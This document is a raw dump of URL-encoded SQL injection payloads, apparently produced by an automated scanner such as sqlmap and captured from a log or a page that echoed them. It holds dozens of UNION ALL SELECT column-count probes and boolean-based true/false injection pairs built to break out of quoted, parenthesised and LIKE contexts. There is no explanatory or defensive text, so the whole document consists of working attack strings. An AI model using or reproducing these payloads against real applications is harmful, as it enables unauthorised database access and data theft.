-6946%27%7C%7C%28SELECT%20%27UYTV%27%20WHERE%208103%3D8103%20UNION%20ALL%20SELECT%208103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103%2C8103--%20 -3676%27%7C%7C%28SELECT%20%27UPAz%27%20WHERE%201709%3D1709%20UNION%20ALL%20SELECT%201709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709%2C1709--%20 -3247%27%7C%7C%28SELECT%20%27ZyEL%27%20WHERE%205806%3D5806%20UNION%20ALL%20SELECT%205806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806--%20 -7127%27%7C%7C%28SELECT%20%27dloy%27%20WHERE%203490%3D3490%20UNION%20ALL%20SELECT%203490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490%2C3490--%20 -8532%27%7C%7C%28SELECT%20%27UmeY%27%20WHERE%206348%3D6348%20UNION%20ALL%20SELECT%206348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348--%20 -3378%27%7C%7C%28SELECT%20%27Dstt%27%20WHERE%203759%3D3759%20UNION%20ALL%20SELECT%203759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759%2C3759--%20 -2868%27%7C%7C%28SELECT%20%27HyUV%27%20WHERE%204717%3D4717%20UNION%20ALL%20SELECT%204717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717%2C4717--%20 -8305%27%7C%7C%28SELECT%20%27Liay%27%20WHERE%202254%3D2254%20UNION%20ALL%20SELECT%202254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254%2C2254--%20 -6683%27%7C%7C%28SELECT%20%27UEdk%27%20WHERE%208565%3D8565%20UNION%20ALL%20SELECT%208565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565%2C8565--%20 -9730%27%2B%28SELECT%20uqMN%20WHERE%203568%3D3568%20UNION%20ALL%20SELECT%203568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568%2C3568--%20 -4685%27%2B%28SELECT%20tGZt%20WHERE%203258%3D3258%20UNION%20ALL%20SELECT%203258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258%2C3258--%20 -1306%27%2B%28SELECT%20urSt%20WHERE%207984%3D7984%20UNION%20ALL%20SELECT%207984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984%2C7984--%20 -4538%27%2B%28SELECT%20RbTF%20WHERE%207636%3D7636%20UNION%20ALL%20SELECT%207636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636%2C7636--%20 -5148%27%2B%28SELECT%20GaFj%20WHERE%206483%3D6483%20UNION%20ALL%20SELECT%206483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483%2C6483--%20 -3974%27%2B%28SELECT%20slOz%20WHERE%204458%3D4458%20UNION%20ALL%20SELECT%204458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458--%20 -9923%27%2B%28SELECT%20CgVk%20WHERE%203294%3D3294%20UNION%20ALL%20SELECT%203294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294%2C3294--%20 -4263%27%2B%28SELECT%20HQXn%20WHERE%209853%3D9853%20UNION%20ALL%20SELECT%209853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853--%20 -5007%27%2B%28SELECT%20DKVU%20WHERE%202752%3D2752%20UNION%20ALL%20SELECT%202752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752%2C2752--%20 -4729%27%2B%28SELECT%20OfAg%20WHERE%204906%3D4906%20UNION%20ALL%20SELECT%204906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906--%20 -8259%27%2B%28SELECT%20%27xWeG%27%20WHERE%209213%3D9213%20UNION%20ALL%20SELECT%209213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213%2C9213--%20 -8002%27%2B%28SELECT%20%27vaFC%27%20WHERE%201596%3D1596%20UNION%20ALL%20SELECT%201596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596%2C1596--%20 -9222%27%2B%28SELECT%20%27vyHK%27%20WHERE%201634%3D1634%20UNION%20ALL%20SELECT%201634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634--%20 -4927%27%2B%28SELECT%20%27BuxV%27%20WHERE%206418%3D6418%20UNION%20ALL%20SELECT%206418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418%2C6418--%20 -8221%27%2B%28SELECT%20%27ioiq%27%20WHERE%204470%3D4470%20UNION%20ALL%20SELECT%204470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470--%20 -5444%27%2B%28SELECT%20%27QikW%27%20WHERE%202829%3D2829%20UNION%20ALL%20SELECT%202829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829%2C2829--%20 -3846%27%2B%28SELECT%20%27cAgY%27%20WHERE%201204%3D1204%20UNION%20ALL%20SELECT%201204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204%2C1204--%20 -3354%27%2B%28SELECT%20%27Hqqp%27%20WHERE%204261%3D4261%20UNION%20ALL%20SELECT%204261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261%2C4261--%20 -1454%27%2B%28SELECT%20%27diii%27%20WHERE%209576%3D9576%20UNION%20ALL%20SELECT%209576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576%2C9576--%20 -8965%27%2B%28SELECT%20%27sQqm%27%20WHERE%207113%3D7113%20UNION%20ALL%20SELECT%207113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113--%20 -3295%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694%2C7694--%20 -8273%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234%2C7234--%20 -3917%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027%2C2027--%20 -7861%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618%2C7618--%20 -9829%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120--%20 -4638%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820--%20 -7645%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105--%20 -1281%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452--%20 -5110%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951--%20 -5431%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254--%20 foo%29%20AND%209302%3D6102 foo%29%20AND%208854%3D8854 foo%27%29%20AND%208308%3D8159 foo%27%29%20AND%208854%3D8854 foo%27%20AND%204403%3D3965 foo%27%20AND%208854%3D8854 foo%22%20AND%202813%3D1402 foo%22%20AND%208854%3D8854 foo%29%20AND%202639%3D7053%20AND%20%282277%3D2277 foo%29%20AND%208854%3D8854%20AND%20%289635%3D9635 foo%29%29%20AND%209635%3D4141%20AND%20%28%284346%3D4346 foo%29%29%20AND%208854%3D8854%20AND%20%28%282569%3D2569 foo%29%29%29%20AND%204144%3D6456%20AND%20%28%28%281897%3D1897 foo%29%29%29%20AND%208854%3D8854%20AND%20%28%28%288676%3D8676 foo%20AND%204352%3D3106 foo%20AND%208854%3D8854 foo%27%29%20AND%203448%3D2154%20AND%20%28%27ofvO%27%3D%27ofvO foo%27%29%20AND%208854%3D8854%20AND%20%28%27TcpV%27%3D%27TcpV foo%27%29%29%20AND%205279%3D9880%20AND%20%28%28%27pFzj%27%3D%27pFzj foo%27%29%29%20AND%208854%3D8854%20AND%20%28%28%27WWFb%27%3D%27WWFb foo%27%29%29%29%20AND%203369%3D8934%20AND%20%28%28%28%27bsfk%27%3D%27bsfk foo%27%29%29%29%20AND%208854%3D8854%20AND%20%28%28%28%27VaMe%27%3D%27VaMe foo%27%20AND%207762%3D4229%20AND%20%27Jyhx%27%3D%27Jyhx foo%27%20AND%208854%3D8854%20AND%20%27MSDx%27%3D%27MSDx foo%27%29%20AND%209058%3D8405%20AND%20%28%27PNuA%27%20LIKE%20%27PNuA foo%27%29%20AND%208854%3D8854%20AND%20%28%27jEpM%27%20LIKE%20%27jEpM foo%27%29%29%20AND%208124%3D6534%20AND%20%28%28%27qmEF%27%20LIKE%20%27qmEF foo%27%29%29%20AND%208854%3D8854%20AND%20%28%28%27Fxzd%27%20LIKE%20%27Fxzd foo%27%29%29%29%20AND%203521%3D5571%20AND%20%28%28%28%27ChFm%27%20LIKE%20%27ChFm foo%27%29%29%29%20AND%208854%3D8854%20AND%20%28%28%28%27xkGL%27%20LIKE%20%27xkGL foo%27%20AND%205419%3D7276%20AND%20%27dHBz%27%20LIKE%20%27dHBz foo%27%20AND%208854%3D8854%20AND%20%27rJbG%27%20LIKE%20%27rJbG foo%22%29%20AND%205540%3D7637%20AND%20%28%22QjYd%22%3D%22QjYd foo%22%29%20AND%208854%3D8854%20AND%20%28%22XoKf%22%3D%22XoKf foo%22%29%29%20AND%205453%3D6973%20AND%20%28%28%22pENw%22%3D%22pENw foo%22%29%29%20AND%208854%3D8854%20AND%20%28%28%22CLjJ%22%3D%22CLjJ foo%22%29%29%29%20AND%204962%3D8682%20AND%20%28%28%28%22fDNj%22%3D%22fDNj foo%22%29%29%29%20AND%208854%3D8854%20AND%20%28%28%28%22vfTH%22%3D%22vfTH foo%22%20AND%204475%3D6675%20AND%20%22qRPZ%22%3D%22qRPZ foo%22%20AND%208854%3D8854%20AND%20%22PYvF%22%3D%22PYvF foo%22%29%20AND%204370%3D1640%20AND%20%28%22ihZp%22%20LIKE%20%22ihZp foo%22%29%20AND%208854%3D8854%20AND%20%28%22gFnR%22%20LIKE%20%22gFnR foo%22%29%29%20AND%203276%3D9182%20AND%20%28%28%22kimj%22%20LIKE%20%22kimj foo%22%29%29%20AND%208854%3D8854%20AND%20%28%28%22esCV%22%20LIKE%20%22esCV foo%22%29%29%29%20AND%202010%3D3910%20AND%20%28%28%28%22YgWk%22%20LIKE%20%22YgWk foo%22%29%29%29%20AND%208854%3D8854%20AND%20%28%28%28%22oNkW%22%20LIKE%20%22oNkW foo%22%20AND%206186%3D4736%20AND%20%22TBcC%22%20LIKE%20%22TBcC foo%22%20AND%208854%3D8854%20AND%20%22bdnf%22%20LIKE%20%22bdnf foo%25%27%29%20AND%208362%3D8710%20AND%20%28%27%25%27%3D%27 foo%25%27%29%20AND%208854%3D8854%20AND%20%28%27%25%27%3D%27 foo%25%27%29%29%20AND%209992%3D6044%20AND%20%28%28%27%25%27%3D%27 foo%25%27%29%29%20AND%208854%3D8854%20AND%20%28%28%27%25%27%3D%27 foo%25%27%29%29%29%20AND%203819%3D1247%20AND%20%28%28%28%27%25%27%3D%27 foo%25%27%29%29%29%20AND%208854%3D8854%20AND%20%28%28%28%27%25%27%3D%27 foo%25%27%20AND%209233%3D8359%20AND%20%27%25%27%3D%27 foo%25%27%20AND%208854%3D8854%20AND%20%27%25%27%3D%27 foo%00%27%29%20AND%208597%3D1061%20AND%20%28%27RKNu%27%3D%27RKNu foo%00%27%29%20AND%208854%3D8854%20AND%20%28%27mjMX%27%3D%27mjMX foo%00%27%20AND%208801%3D5233%20AND%20%27WVBC%27%3D%27WVBC foo%00%27%20AND%208854%3D8854%20AND%20%27WzLX%27%3D%27WzLX foo%27%29%20WHERE%201089%3D1089%20AND%208779%3D1752%20--%20 foo%27%29%20WHERE%205389%3D5389%20AND%208854%3D8854%20--%20 foo%22%29%20WHERE%207086%3D7086%20AND%205479%3D1195%20--%20 foo%22%29%20WHERE%205320%3D5320%20AND%208854%3D8854%20--%20 foo%29%20WHERE%205790%3D5790%20AND%204977%3D1359%20--%20 foo%29%20WHERE%203041%3D3041%20AND%208854%3D8854%20--%20 foo%27%20WHERE%202948%3D2948%20AND%201866%3D9286%20--%20 foo%27%20WHERE%208580%3D8580%20AND%208854%3D8854%20--%20 foo%22%20WHERE%202597%3D2597%20AND%204419%3D5439%20--%20 foo%22%20WHERE%205137%3D5137%20AND%208854%3D8854%20--%20 foo%20WHERE%206903%3D6903%20AND%203295%3D5618%20--%20 foo%20WHERE%206143%3D6143%20AND%208854%3D8854%20--%20 foo%27%7C%7C%28SELECT%20%27aTQz%27%20FROM%20DUAL%20WHERE%208858%3D8858%20AND%207325%3D6403%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27eLFt%27%20FROM%20DUAL%20WHERE%205440%3D5440%20AND%208854%3D8854%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27mnIk%27%20WHERE%208799%3D8799%20AND%204921%3D8904%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27qrAU%27%20WHERE%209355%3D9355%20AND%208854%3D8854%20%29%7C%7C%27 foo%27%2B%28SELECT%20ioYN%20WHERE%206512%3D6512%20AND%202277%3D4087%20%29%2B%27 foo%27%2B%28SELECT%20StdR%20WHERE%208546%3D8546%20AND%208854%3D8854%20%29%2B%27 foo%27%2B%28SELECT%20%27TtRT%27%20WHERE%208909%3D8909%20AND%201718%3D8161%20%29%2B%27 foo%27%2B%28SELECT%20%27FhLf%27%20WHERE%201129%3D1129%20AND%208854%3D8854%20%29%2B%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%204006%3D6967%20%23 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%208854%3D8854%20%23 foo%29%20AND%202172%3D3467%23 foo%29%20AND%202294%3D2294%23 foo%27%29%20AND%207678%3D9533%23 foo%27%29%20AND%202294%3D2294%23 foo%27%20AND%205375%3D7595%23 foo%27%20AND%202294%3D2294%23 foo%22%20AND%204190%3D8375%23 foo%22%20AND%202294%3D2294%23 foo%29%20AND%203567%3D6910%23 foo%29%20AND%202294%3D2294%23 foo%29%29%20AND%204694%3D3180%23 foo%29%29%20AND%202294%3D2294%23 foo%29%29%29%20AND%203414%3D9619%23 foo%29%29%29%20AND%202294%3D2294%23 foo%20AND%204173%3D8834%23 foo%20AND%202294%3D2294%23 foo%27%29%20AND%206749%3D1582%23 foo%27%29%20AND%202294%3D2294%23 foo%27%29%29%20AND%207855%3D6948%23 foo%27%29%29%20AND%202294%3D2294%23 foo%27%29%29%29%20AND%201725%3D7512%23 foo%27%29%29%29%20AND%202294%3D2294%23 foo%27%20AND%204697%3D7523%23 foo%27%20AND%202294%3D2294%23 foo%27%29%20AND%209106%3D1203%23 foo%27%29%20AND%202294%3D2294%23 foo%27%29%29%20AND%202854%3D4617%23 foo%27%29%29%20AND%202294%3D2294%23 foo%27%29%29%29%20AND%209066%3D8350%23 foo%27%29%29%29%20AND%202294%3D2294%23 